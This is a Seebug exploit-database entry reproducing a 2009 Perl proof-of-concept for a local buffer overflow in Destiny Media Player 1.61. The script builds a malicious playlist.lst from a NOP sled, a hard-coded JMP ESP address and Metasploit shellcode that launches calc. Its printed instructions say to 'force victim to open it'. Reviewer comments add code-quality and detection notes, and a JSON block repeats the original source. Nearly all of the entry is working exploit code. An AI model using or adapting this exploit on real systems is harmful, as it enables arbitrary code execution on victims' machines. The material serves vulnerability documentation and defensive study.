ID SSV:66129
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source.
#!/user/bin/perl
#Destiny Media Player 1.61 Local BoF Code
#Exploit Coded by : sCORPINo
#Snoop Security Researching Committe
#originally discovered by: Encrypt3d.M!nd
# windows/exec - 142 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=thread, CMD=calc
# Proof-of-concept file generator. It only concatenates a byte string and
# writes it to disk as a playlist file; per the header comments, opening that
# file in Destiny Media Player 1.61 triggers a local buffer overflow.
# NOTE(review): the script declares no `use strict` / `use warnings`, so every
# variable below is a package global and I/O problems are silent.
#
# Payload as labelled by the author: Metasploit windows/exec, CMD=calc,
# EXITFUNC=thread, x86/fnstenv_mov encoder, 142 bytes. The literal is 10 rows
# of 14 bytes plus a final 2, which matches the stated 142.
$shellcode =
"\x6a\x1e\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x64" .
"\xfc\xb1\x5d\x83\xeb\xfc\xe2\xf4\x98\x14\xf5\x5d\x64\xfc" .
"\x3a\x18\x58\x77\xcd\x58\x1c\xfd\x5e\xd6\x2b\xe4\x3a\x02" .
"\x44\xfd\x5a\x14\xef\xc8\x3a\x5c\x8a\xcd\x71\xc4\xc8\x78" .
"\x71\x29\x63\x3d\x7b\x50\x65\x3e\x5a\xa9\x5f\xa8\x95\x59" .
"\x11\x19\x3a\x02\x40\xfd\x5a\x3b\xef\xf0\xfa\xd6\x3b\xe0" .
"\xb0\xb6\xef\xe0\x3a\x5c\x8f\x75\xed\x79\x60\x3f\xee\x6c" .
"\x92\x9c\xe7\x39\xef\xba\x81\xd6\x24\xf0\x3a\x2d\x78\x51" .
"\x3a\x35\x6c\x75\x49\xde\xa4\x96\xe1\x35\x8b\x32\x51\x3d" .
"\x0c\x64\x4f\xd7\x6a\xab\x4e\xba\x07\x9d\xdd\x3e\x64\xfc" .
"\xb1\x5d";
# 2052 bytes of 0x90 (x86 NOP) used as filler. Presumably 2052 is the distance
# to the saved return address in the affected build -- the page does not say
# how the offset was determined.
$nops = "\x90" x 2052; # filler in front of the 4-byte address
# NOTE(review): $nops2 is assigned but never read; $attack below uses $nops twice.
$nops2 = "\x90" x 100; # unused (author's note: "fill the buffer more")
# Hard-coded absolute address stored little-endian. The author's comment says
# 0x7CA58265 holds a JMP ESP instruction; the page does not name the module or
# OS build it was taken from. A fixed address like this is only valid where
# that module loads at the same base, which is why ASLR (and DEP for the
# stack-resident payload) are the relevant platform mitigations.
$eip = "\x65\x82\xA5\x7c"; #7CA58265 JMP ESP
# File layout: 2052 x 0x90 | 4-byte address | 2052 x 0x90 | 142-byte payload,
# 4250 bytes in total. Defender note: a .lst file that is almost entirely 0x90
# and contains no playlist text is a simple content signature for file scanning.
$attack = $nops.$eip.$nops.$shellcode; # filler + address + filler + payload
$playlist="playlist.lst"; # output file name, relative to the current directory
intro();
# NOTE(review): two-argument open with the mode interpolated into the name, and
# the return value is not checked -- the messages below print even if the file
# could not be created. The three-argument form with an `or die` is the safe idiom.
open($FILE, ">$playlist");
print $FILE $attack;
close($FILE);
print "\n\n\n$playlist created beside this exploit.\n";
print "force victim to open it with Destiny Media Player 1.61\n";
print "good luck\n\n";
# Print the author's credit banner to STDOUT. Takes no arguments; the banner
# text is static and contains nothing that interpolates.
sub intro {
    my $banner = qq(
############################################################
## Snoop Security Researching Committe ##
## www.snoop-security.com ##
## sCORPINo ##
## Destiny Media Player 1.61 Local BoF Code ##
## found by: ##
## http://www.milw0rm.com/exploits/7652 ##
## special tnX to: ##
## Shahriyar, Adel, Alireza, Yashar and all snoop members ##
## just run and open the playlist.lst with ##
## Destiny Media Player.then BOOM ! ##
############################################################
);
    print $banner;
}
# milw0rm.com [2009-01-04]
{"lastseen": "2017-11-19T14:43:17", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2017-11-19T14:43:17", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T14:43:17", "rev": 2}, "vulnersScore": 0.2}, "href": "https://www.seebug.org/vuldb/ssvid-66129", "references": [], "enchantments_done": [], "id": "SSV:66129", "title": "Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (2)", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 1, "sourceData": "\n #!/user/bin/perl\r\n#Destiny Media Player 1.61 Local BoF Code\r\n#Exploit Coded by : sCORPINo\r\n#Snoop Security Researching Committe \r\n#originally discovered by: Encrypt3d.M!nd\r\n\r\n# windows/exec - 142 bytes\r\n# http://www.metasploit.com\r\n# Encoder: x86/fnstenv_mov\r\n# EXITFUNC=thread, CMD=calc\r\n$shellcode =\r\n"\\x6a\\x1e\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x64" .\r\n"\\xfc\\xb1\\x5d\\x83\\xeb\\xfc\\xe2\\xf4\\x98\\x14\\xf5\\x5d\\x64\\xfc" .\r\n"\\x3a\\x18\\x58\\x77\\xcd\\x58\\x1c\\xfd\\x5e\\xd6\\x2b\\xe4\\x3a\\x02" .\r\n"\\x44\\xfd\\x5a\\x14\\xef\\xc8\\x3a\\x5c\\x8a\\xcd\\x71\\xc4\\xc8\\x78" .\r\n"\\x71\\x29\\x63\\x3d\\x7b\\x50\\x65\\x3e\\x5a\\xa9\\x5f\\xa8\\x95\\x59" .\r\n"\\x11\\x19\\x3a\\x02\\x40\\xfd\\x5a\\x3b\\xef\\xf0\\xfa\\xd6\\x3b\\xe0" .\r\n"\\xb0\\xb6\\xef\\xe0\\x3a\\x5c\\x8f\\x75\\xed\\x79\\x60\\x3f\\xee\\x6c" .\r\n"\\x92\\x9c\\xe7\\x39\\xef\\xba\\x81\\xd6\\x24\\xf0\\x3a\\x2d\\x78\\x51" .\r\n"\\x3a\\x35\\x6c\\x75\\x49\\xde\\xa4\\x96\\xe1\\x35\\x8b\\x32\\x51\\x3d" .\r\n"\\x0c\\x64\\x4f\\xd7\\x6a\\xab\\x4e\\xba\\x07\\x9d\\xdd\\x3e\\x64\\xfc" .\r\n"\\xb1\\x5d";\r\n$nops = "\\x90" x 2052; \t #fill the buffer\r\n$nops2 = "\\x90" x 100;\t\t #fill the buffer more:p\r\n$eip = "\\x65\\x82\\xA5\\x7c";\t #7CA58265 JMP 
ESP\r\n$attack = $nops.$eip.$nops.$shellcode; #sandwich\r\n$playlist="playlist.lst"; #playlist name,chage it to anything you want\r\nintro();\r\n\r\nopen($FILE, ">$playlist");\r\nprint $FILE $attack;\r\nclose($FILE);\r\nprint "\\n\\n\\n$playlist created beside this exploit.\\n";\r\nprint "force victim to open it with Destiny Media Player 1.61\\n";\r\nprint "good luck\\n\\n";\r\n\r\nsub intro{\r\nprint qq(\r\n############################################################\r\n## Snoop Security Researching Committe ##\r\n## www.snoop-security.com ##\r\n## sCORPINo ##\r\n## Destiny Media Player 1.61 Local BoF Code ##\r\n## found by: ##\r\n## http://www.milw0rm.com/exploits/7652 ##\r\n## special tnX to: ##\r\n## Shahriyar, Adel, Alireza, Yashar and all snoop members ##\r\n## just run and open the playlist.lst with ##\r\n## Destiny Media Player.then BOOM ! ##\r\n############################################################\r\n);\r\n}\r\n\r\n# milw0rm.com [2009-01-04]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-66129", "type": "seebug"}
{}